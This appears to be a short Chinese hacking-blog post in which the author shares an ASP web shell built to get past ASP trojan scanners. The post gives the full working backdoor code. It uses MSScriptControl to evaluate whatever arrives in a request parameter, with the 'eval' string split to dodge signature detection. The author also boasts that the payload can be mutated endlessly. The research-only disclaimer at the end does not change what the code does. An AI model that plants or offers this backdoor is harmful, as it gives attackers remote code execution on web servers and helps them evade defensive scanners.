作者:sobiny [b.c.t]
来源:http://sobiny.cn
今天在LCX牛牛的BLOG上看到了一个新的绕过那个什么查ASP 马的东西。。
怎么说呢,其实如果单说写文件到服务器上来留后门的话。
可能大概也只有10多种方法吧可以绕过吧。
但是像这种可以直接执行的,好象还少着。。
既然他们都公布得愉快。
我也发一个我觉得拿得出手的吧。
等着那些检测程序加入新的特征吧,啊哈哈。
<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""aaaa""))")
%>
大家其实也都看得出来,ExecuteStatement里面的东西可以无限变形。。
其实这里面需要的东西,我都给出了。
不过我不太喜欢把细节完全公开。
我把饭给你准备好了,你不会还要我给你喂吧?
最后要说的话:
ASP,其实不仅仅是ASP。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论